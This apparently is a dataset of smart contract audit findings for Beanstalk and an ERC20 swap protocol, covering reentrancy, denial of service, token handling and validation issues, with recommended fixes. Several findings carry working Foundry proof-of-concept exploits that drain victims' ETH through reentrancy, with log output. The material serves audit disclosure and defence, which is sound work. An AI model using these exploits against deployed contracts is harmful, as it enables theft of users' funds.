newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n\\nHowever, with the change of dependency involved in the Wells integration, this restriction no longer holds:\\n```\\n function addUnderlying(uint256 usdAmount, uint256 minAmountOut) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // Calculate how many new Deposited Beans will be minted\\n uint256 percentToFill = usdAmount.mul(C.precision()).div(\\n remainingRecapitalization()\\n );\\n uint256 newDepositedBeans;\\n if (C.unripeBean().totalSupply() > s.u[C.UNRIPE_BEAN].balanceOfUnderlying) {\\n newDepositedBeans = (C.unripeBean().totalSupply()).sub(\\n s.u[C.UNRIPE_BEAN].balanceOfUnderlying\\n );\\n newDepositedBeans = newDepositedBeans.mul(percentToFill).div(\\n C.precision()\\n );\\n }\\n\\n // Calculate how many Beans to add as LP\\n uint256 newDepositedLPBeans = usdAmount.mul(C.exploitAddLPRatio()).div(\\n DECIMALS\\n );\\n\\n // Mint the Deposited Beans to Beanstalk.\\n C.bean().mint(\\n address(this),\\n newDepositedBeans\\n );\\n\\n // Mint the LP Beans to the Well to sync.\\n C.bean().mint(\\n address(C.BEAN_ETH_WELL),\\n newDepositedLPBeans\\n );\\n\\n // @audit If nothing was previously deposited this function returns 0, IT DOES NOT REVERT\\n uint256 newLP = IWell(C.BEAN_ETH_WELL).sync(\\n address(this),\\n minAmountOut\\n );\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(usdAmount);\\n }\\n```\\n\\nGiven that the new integration does not revert when attempting to add 0 Fertilizer, it is now possible to add a self-referential node to the end FIFO list, but only if this is the first Fertilizer NFT to be minted for the current season by twice calling `FertilizerFacet.mintFertilizer(0, 0, 0, mode)`. The validation performed to prevent duplicate ids is erroneously bypassed given the Fertilizer amount for the given Id remains zero.\\n```\\n function push(uint128 id) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (s.fFirst == 0) {\\n // Queue is empty\\n s.season.fertilizing = true;\\n s.fLast = id;\\n s.fFirst = id;\\n } else if (id <= s.fFirst) {\\n // Add to front of queue\\n setNext(id, s.fFirst);\\n s.fFirst = id;\\n } else if (id >= s.fLast) { // @audit this block is entered twice\\n // Add to back of queue\\n setNext(s.fLast, id); // @audit the second time, a reference is added to the same id\\n s.fLast = id;\\n } else {\\n // Add to middle of queue\\n uint128 prev = s.fFirst;\\n uint128 next = getNext(prev);\\n // Search for proper place in line\\n while (id > next) {\\n prev = next;\\n next = getNext(next);\\n }\\n setNext(prev, id);\\n setNext(id, next);\\n }\\n }\\n```\\n\\nDespite first perhaps seeming harmless, this element can never be remove unless otherwise overridden:\\n```\\n function pop() internal returns (bool) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n uint128 first = s.fFirst;\\n s.activeFertilizer = s.activeFertilizer.sub(getAmount(first)); // @audit getAmount(first) would return 0\\n uint128 next = getNext(first);\\n if (next == 0) { // @audit next != 0, therefore this conditional block is skipped\\n // If all Unfertilized Beans have been fertilized, delete line.\\n require(s.activeFertilizer == 0, ""Still active fertilizer"");\\n s.fFirst = 0;\\n s.fLast = 0;\\n s.season.fertilizing = false;\\n return false;\\n }\\n s.fFirst = getNext(first); // @audit this gets s.first again\\n return true; // @audit always returns true for a self-referential node\\n }\\n```\\n\\n`LibFertilizer::pop` is used in `Sun::rewardToFertilizer` which is called through `Sun::rewardBeans` when fertilizing. This function is called through `Sun::stepSun` if the current Bean price is above peg. By preventing the last element from being popped from the list, assuming this element is reached, an infinite loop occurs given that the `while` loop continues to execute, resulting in denial-of-service on `SeasonFacet::gm` when above peg.\\nThe most remarkable detail of this issue is that this state can be forced when above peg and having already been fully recapitalized. Given that it is not possible to mint additional Fertilizer with the associated Beans, this means that a DoS attack can be performed on `SeasonFacet::gm` once recapitalization is reached if the BEAN price is above peg.","Despite being a complex issue to explain, the solution is as simple as replacing `>` with `>=` in `LibFertilizer::addFertilizer` as below:\\n```\\n function addFertilizer(\\n uint128 season,\\n uint256 fertilizerAmount,\\n uint256 minLP\\n ) internal returns (uint128 id) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n uint128 fertilizerAmount128 = fertilizerAmount.toUint128();\\n\\n // Calculate Beans Per Fertilizer and add to total owed\\n uint128 bpf = getBpf(season);\\n s.unfertilizedIndex = s.unfertilizedIndex.add(\\n fertilizerAmount.mul(bpf)\\n );\\n // Get id\\n id = s.bpf.add(bpf);\\n // Update Total and Season supply\\n s.fertilizer[id] = s.fertilizer[id].add(fertilizerAmount128);\\n s.activeFertilizer = s.activeFertilizer.add(fertilizerAmount);\\n // Add underlying to Unripe Beans and Unripe LP\\n addUnderlying(fertilizerAmount.mul(DECIMALS), minLP);\\n // If not first time adding Fertilizer with this id, return\\n// Remove the line below\\n if (s.fertilizer[id] > fertilizerAmount128) return id;\\n// Add the line below\\n if (s.fertilizer[id] >= fertilizerAmount128) return id; // prevent infinite loop in `Sun::rewardToFertilizer` when attempting to add 0 Fertilizer, which could DoS `SeasonFacet::gm` when recapitalization is fulfilled\\n // If first time, log end Beans Per Fertilizer and add to Season queue.\\n push(id);\\n emit SetFertilizer(id, bpf);\\n }\\n```\\n","It is possible to perform a denial-of-service (DoS) attack on `SeasonFacet::gm` if the Bean price is above the peg, either once fully recapitalized or when reaching the last element of the Fertilizer FIFO list.\\nProof of Concept: This coded PoC can be run by:\\nCreating file `Beantalk/protocol/test/POCs/mint0Fertilizer.test.js`\\nNavigating to `Beantalk/protocol`\\nRunning `yarn test --grep ""DOS last fertilizer payment through minting 0 fertilizers""`","```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n" +Use safe transfer for ERC20 tokens,medium,"The protocol intends to support all ERC20 tokens but the implementation uses the original transfer functions. Some tokens (like USDT) do not implement the EIP20 standard correctly and their transfer/transferFrom function return void instead of a success boolean. Calling these functions with the correct EIP20 function signatures will revert.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), ""Token Address is not an ERC20"");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), ""ERC20 Transfer failed"");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), ""ERC20 Balance check failed"");\\n }\\n```\\n",We recommend using OpenZeppelin's SafeERC20 versions with the safeTransfer and safeTransferFrom functions that handle the return value check as well as non-standard-compliant tokens.,"Tokens that do not correctly implement the EIP20 like USDT, will be unusable in the protocol as they revert the transaction because of the missing return value.","```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), ""Token Address is not an ERC20"");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), ""ERC20 Transfer failed"");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), ""ERC20 Balance check failed"");\\n }\\n```\\n" +Fee-on-transfer tokens are not supported,medium,"The protocol intends to support all ERC20 tokens but does not support fee-on-transfer tokens. The protocol utilizes the functions `TransferUtils::_transferERC20()` and `TransferUtils::_transferFromERC20()` to transfer ERC20 tokens.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), ""Token Address is not an ERC20"");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), ""ERC20 Transfer failed"");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), ""ERC20 Balance check failed"");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n\\nThe implementation verifies that the transfer was successful by checking that the balance of the recipient is greater than or equal to the initial balance plus the amount transferred. This check will fail for fee-on-transfer tokens because the actual received amount will be less than the input amount. (Read here about fee-on-transfer tokens)\\nAlthough there are very few fee-on-transfer tokens, the protocol can't say it supports all ERC20 tokens if it doesn't support these weird ERC20 tokens.",The transfer utility functions can be updated to return the actually received amount. Or clearly document that only standard ERC20 tokens are supported.,"Fee-on-transfer tokens can not be used for the protocol. Because of the rarity of these tokens, we evaluate this finding as a Medium risk.","```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), ""Token Address is not an ERC20"");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), ""ERC20 Transfer failed"");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), ""ERC20 Balance check failed"");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n" +Centralization risk,medium,"The protocol has an owner with privileged rights to perform admin tasks that can affect users. Especially, the owner can change the fee settings and reward handler address.\\nValidation is missing for admin fee setter functions.\\n```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, ""Fee percentage must be less than 1"");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n\\nImportant changes initiated by admin should be logged via events.\\n```\\nFile: helpers/FeeData.sol\\n\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n\\n function setMaxHops(uint256 maxHops) external onlyOwner {\\n\\n function setMaxSwaps(uint256 maxSwaps) external onlyOwner {\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {\\n\\n function setFeeToken(address feeTokenAddress) public onlyOwner {\\n\\n function setFeeTokens(address[] memory feeTokenAddresses) public onlyOwner {\\n\\n function clearFeeTokens() public onlyOwner {\\n```\\n\\n```\\nFile: helpers/TransferHelper.sol\\n\\n function setRewardHandler(address rewardAddress) external onlyOwner {\\n\\n function setRewardsActive(bool _rewardsActive) external onlyOwner {\\n```\\n",Specify the owner's privileges and responsibilities in the documentation.\\nAdd constant state variables that can be used as the minimum and maximum values for the fee settings.\\nAdd proper validation for the admin functions.\\nLog the changes in the important state variables via events.,"While the protocol owner is regarded as a trusted party, the owner can change the fee settings and reward handler address without any validation or logging. This can lead to unexpected results and users can be affected.","```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, ""Fee percentage must be less than 1"");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n" +Validation is missing for tokenA in `SwapExchange::calculateMultiSwap()`,low,"The protocol supports claiming a chain of swaps and the function `SwapExchange::calculateMultiSwap()` is used to do some calculations including the amount of tokenA that can be received for a given amount of tokenB. Looking at the implementation, the protocol does not validate that the tokenA of the last swap in the chain is actually the same as the tokenA of `multiClaimInput`. Because this view function is supposed to be used by the frontend to 'preview' the result of a `MultiSwap`, this does not imply a direct security risk but can lead to unexpected results. (It is notable that the actual swap function `SwapExchange::_claimMultiSwap()` implemented a proper validation.)\\n```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\n",Add a validation that the tokenA of the last swap in the chain is the same as the tokenA of `multiClaimInput`.,The function will return an incorrect swap calculation result if the last swap in the chain has a different tokenA than the tokenA of `multiClaimInput` and it can lead to unexpected results.,"```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\n" +Intermediate value sent by the caller can be drained via reentrancy when `Pipeline` execution is handed off to an untrusted external contract,high,"Pipeline is a utility contract created by the Beanstalk Farms team that enables the execution of an arbitrary number of valid actions in a single transaction. The `DepotFacet` is a wrapper around Pipeline for use within the Beanstalk Diamond proxy. When utilizing Pipeline through the `DepotFacet`, Ether value is first loaded by a payable call to the Diamond proxy fallback function, which then delegates execution to the logic of the respective facet function. Once the `DepotFacet::advancedPipe` is called, for example, value is forwarded on to a function of the same name within Pipeline.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n\\nThe important point to note here is that rather than sending the full Ether amount received by the Diamond proxy, the amount sent to Pipeline is equal to that of the `value` argument above, necessitating the use of `LibEth::refundEth`, which itself transfers the entire proxy Ether balance to the caller, following the call to return any unspent Ether.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, ""Eth transfer Failed."");\\n }\\n}\\n```\\n\\nThis logic appears to be correct and work as intended; however, issues can arise due to the lack of reentrancy guard on `DepotFacet` and `Pipeline` functions. Given the nature of `Pipeline` calls to potentially untrusted external contracts, which themselves may also hand off execution to their own set of untrusted external contracts, this can become an issue if a malicious contract calls back into Beanstalk and/or `Pipeline`.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes)\\n external\\n payable\\n override\\n returns (bytes[] memory results) {\\n results = new bytes[](pipes.length);\\n for (uint256 i = 0; i < pipes.length; ++i) {\\n results[i] = _advancedPipe(pipes[i], results);\\n }\\n }\\n```\\n\\nContinuing with the example of `DepotFacet::advancedPipe`, say, for example, one of the pipe calls involves an NFT mint/transfer in which some external contract is paid royalties in the form of a low-level call with ETH attached or some safe transfer check hands-off execution in this way, the malicious recipient could initiate a call to the Beanstalk Diamond which once again triggers `DepotFacet::advancedPipe` but this time with an empty `pipes` array. Given the implementation of `Pipeline::advancedPipe` above, this will simply return an empty bytes array and fall straight through to the ETH refund. Since the proxy balance is non-zero, assuming `value != msg.value` in the original call, this `msg.value - value` difference will be transferred to the malicious caller. Once execution returns to the original context and the original caller's transaction is nearing completion, the contract will no longer have any excess ETH, even though it is the original caller who should have received a refund of unspent funds.\\nThis finding also applies to `Pipeline` itself, in which a malicious contract can similarly reenter `Pipeline` and utilize intermediate Ether balance without sending any `value` of their own. For example, given `getEthValue` does not validate the clipboard `value` against the payable `value` (likely due to its current usage within a loop), `Pipeline::advancedPipe` could be called with a single `AdvancedPipeCall` with normal pipe encoding which calls another address owned by the attacker, again forwarding all remaining Ether given they are able to control the `value` parameter. It is, of course, feasible that the original caller attempts to perform some other more complicated pipes following the first, which may revert with 'out of funds' errors, causing the entire advanced pipe call to fail if no tolerant mode behavior is implemented on the target contract, so the exploiter would need to be strategic in these scenarios if they wish to elevate they exploit from denial-of-service to the stealing of funds.","Add reentrancy guards to both the `DepotFacet` and `Pipeline`. Also, consider validating clipboard Ether values in `Pipeline::_advancedPipe` against the payable function value in `Pipeline::advancedPipe`.","A malicious external contract handed control of execution during the lifetime of a Pipeline call can reenter and steal intermediate user funds. As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of an NFT royalty recipient, for example, to re-enter both Beanstalk and Pipeline, draining funds remaining in the Diamond and Pipeline that should have been refunded to/utilized by the original caller at the end of execution:\\n```\\ncontract DepotFacetPoC is Test {\\n RoyaltyRecipient exploiter;\\n address exploiter1;\\n DummyNFT dummyNFT;\\n address victim;\\n\\n function setUp() public {\\n vm.createSelectFork(""mainnet"", ATTACK_BLOCK);\\n\\n exploiter = new RoyaltyRecipient();\\n dummyNFT = new DummyNFT(address(exploiter));\\n victim = makeAddr(""victim"");\\n vm.deal(victim, 10 ether);\\n\\n exploiter1 = makeAddr(""exploiter1"");\\n console.log(""exploiter1: "", exploiter1);\\n\\n address _pipeline = address(new Pipeline());\\n vm.etch(PIPELINE, _pipeline.code);\\n\\n vm.label(BEANSTALK, ""Beanstalk Diamond"");\\n vm.label(address(dummyNFT), ""DummyNFT"");\\n vm.label(address(exploiter), ""Exploiter"");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint(""Victim balance before: "", victim.balance);\\n emit log_named_uint(""BEANSTALK balance before: "", BEANSTALK.balance);\\n emit log_named_uint(""PIPELINE balance before: "", PIPELINE.balance);\\n emit log_named_uint(""DummyNFT balance before: "", address(dummyNFT).balance);\\n emit log_named_uint(""Exploiter balance before: "", address(exploiter).balance);\\n emit log_named_uint(""Exploiter1 balance before: "", exploiter1.balance);\\n\\n vm.startPrank(victim);\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(dummyNFT), abi.encodePacked(dummyNFT.mintNFT.selector), abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(1 ether)));\\n IBeanstalk(BEANSTALK).advancedPipe{value: 10 ether}(pipes, 4 ether);\\n vm.stopPrank();\\n\\n emit log_named_uint(""Victim balance after: "", victim.balance);\\n emit log_named_uint(""BEANSTALK balance after: "", BEANSTALK.balance);\\n emit log_named_uint(""PIPELINE balance after: "", PIPELINE.balance);\\n emit log_named_uint(""DummyNFT balance after: "", address(dummyNFT).balance);\\n emit log_named_uint(""Exploiter balance after: "", address(exploiter).balance);\\n emit log_named_uint(""Exploiter1 balance after: "", exploiter1.balance);\\n }\\n}\\n\\ncontract DummyNFT {\\n address immutable i_royaltyRecipient;\\n constructor(address royaltyRecipient) {\\n i_royaltyRecipient = royaltyRecipient;\\n }\\n\\n function mintNFT() external payable returns (bool success) {\\n // imaginary mint/transfer logic\\n console.log(""minting/transferring NFT"");\\n // console.log(""msg.value: "", msg.value);\\n\\n // send royalties\\n uint256 value = msg.value / 10;\\n console.log(""sending royalties"");\\n (success, ) = payable(i_royaltyRecipient).call{value: value}("""");\\n }\\n}\\n\\ncontract RoyaltyRecipient {\\n bool exploited;\\n address constant exploiter1 = 0xDE47CfF686C37d501AF50c705a81a48E16606F08;\\n\\n fallback() external payable {\\n console.log(""entered exploiter fallback"");\\n console.log(""Beanstalk balance: "", BEANSTALK.balance);\\n console.log(""Pipeline balance: "", PIPELINE.balance);\\n console.log(""Exploiter balance: "", address(this).balance);\\n if (!exploited) {\\n exploited = true;\\n console.log(""exploiting depot facet advanced pipe"");\\n IBeanstalk(BEANSTALK).advancedPipe(new AdvancedPipeCall[](0), 0);\\n console.log(""exploiting pipeline advanced pipe"");\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(exploiter1), """", abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(PIPELINE.balance)));\\n IPipeline(PIPELINE).advancedPipe(pipes);\\n }\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to net 9 additional Ether at the expense of the victim:\\n```\\nRunning 1 test for test/DepotFacetPoC.t.sol:DepotFacetPoC\\n[PASS] test_attack() (gas: 182190)\\nLogs:\\n exploiter1: 0xDE47CfF686C37d501AF50c705a81a48E16606F08\\n Victim balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n PIPELINE balance before: : 0\\n DummyNFT balance before: : 0\\n Exploiter balance before: : 0\\n Exploiter1 balance before: : 0\\n entered pipeline advanced pipe\\n msg.value: 4000000000000000000\\n minting/transferring NFT\\n sending royalties\\n entered exploiter fallback\\n Beanstalk balance: 6000000000000000000\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 100000000000000000\\n exploiting depot facet advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 6100000000000000000\\n exploiting pipeline advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n Victim balance after: : 0\\n BEANSTALK balance after: : 0\\n PIPELINE balance after: : 0\\n DummyNFT balance after: : 900000000000000000\\n Exploiter balance after: : 6100000000000000000\\n Exploiter1 balance after: : 3000000000000000000\\n```\\n","```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n" +`FarmFacet` functions are susceptible to the draining of intermediate value sent by the caller via reentrancy when execution is handed off to an untrusted external contract,high,"The `FarmFacet` enables multiple Beanstalk functions to be called in a single transaction using Farm calls. Any function stored in Beanstalk's EIP-2535 DiamondStorage can be called as a Farm call and, similar to the Pipeline calls originated in the `DepotFacet`, advanced Farm calls can be made within `FarmFacet` utilizing the ""clipboard"" encoding documented in `LibFunction`.\\nBoth `FarmFacet::farm` and `FarmFacet::advancedFarm` make use of the `withEth` modifier defined as follows:\\n```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n\\nUsed in conjunction with `LibEth::refundEth`, within the `DepotFacet`, for example, the call is identified as originating from the `FarmFacet` if `s.isFarm == 2`. This indicates that an ETH refund should occur at the end of top-level `FarmFacet` function call rather than intermediate Farm calls within Beanstalk so that the value can be utilized in subsequent calls.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, ""Eth transfer Failed."");\\n }\\n}\\n```\\n\\nSimilar to the vulnerabilities in `DepotFacet` and `Pipeline`, `FarmFacet` Farm functions are also susceptible to the draining of intermediate value sent by the caller via reentrancy by an untrusted and malicious external contract. In this case, the attacker could be the recipient of Beanstalk Fertilizer, for example, given this is a likely candidate for an action that may be performed via `FarmFacet` functions, utilizing `TokenSupportFacet::transferERC1155`, and because transfers of these tokens are performed ""safely"" by calling `Fertilizer1155:__doSafeTransferAcceptanceCheck` which in turn calls the `IERC1155ReceiverUpgradeable::onERC1155Received` hook on the Fertilizer recipient.\\nContinuing the above example, a malicious recipient could call back into the `FarmFacet` and re-enter the Farm functions via the `Fertilizer1155` safe transfer acceptance check with empty calldata and only `1 wei` of payable value. This causes the execution of the attacker's transaction to fall straight through to the refund logic, given no loop iterations occur on the empty data and the conditional blocks within the modifier are entered due to the (ever so slightly) non-zero `msg.value`. The call to `LibEth::refundEth` will succeed sinces.isFarm == 1 in the attacker's context, sending the entire Diamond proxy balance. When execution continues in the context of the original caller's Farm call, it will still enter the conditional since their `msg.value` was also non-zero; however, there is no longer any ETH balance to refund, so this call will fall through without sending any value as the conditional block is not entered.",Add a reentrancy guard to `FarmFacet` Farm functions.\\n\\clearpage,"A malicious external contract handed control of execution during the lifetime of a Farm call can reenter and steal intermediate user funds. As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of a Fertilizer recipient, for example, to re-enter Beanstalk, draining funds remaining in the Diamond that should have been refunded to the original caller at the end of execution:\\n```\\ncontract FertilizerRecipient {\\n bool exploited;\\n\\n function onERC1155Received(address, address, uint256, uint256, bytes calldata) external returns (bytes4) {\\n console.log(""entered exploiter onERC1155Received"");\\n if (!exploited) {\\n exploited = true;\\n console.log(""exploiting farm facet farm call"");\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](0);\\n IBeanstalk(BEANSTALK).advancedFarm{value: 1 wei}(data);\\n console.log(""finished exploiting farm facet farm call"");\\n }\\n return bytes4(0xf23a6e61);\\n }\\n\\n fallback() external payable {\\n console.log(""entered exploiter fallback"");\\n console.log(""Beanstalk balance: "", BEANSTALK.balance);\\n console.log(""Exploiter balance: "", address(this).balance);\\n }\\n}\\n\\ncontract FarmFacetPoC is Test {\\n uint256 constant TOKEN_ID = 3445713;\\n address constant VICTIM = address(0x995D1e4e2807Ef2A8d7614B607A89be096313916);\\n FertilizerRecipient exploiter;\\n\\n function setUp() public {\\n vm.createSelectFork(""mainnet"", ATTACK_BLOCK);\\n\\n FarmFacet farmFacet = new FarmFacet();\\n vm.etch(FARM_FACET, address(farmFacet).code);\\n\\n Fertilizer fert = new Fertilizer();\\n vm.etch(FERTILIZER, address(fert).code);\\n\\n assertGe(IERC1155(FERTILIZER).balanceOf(VICTIM, 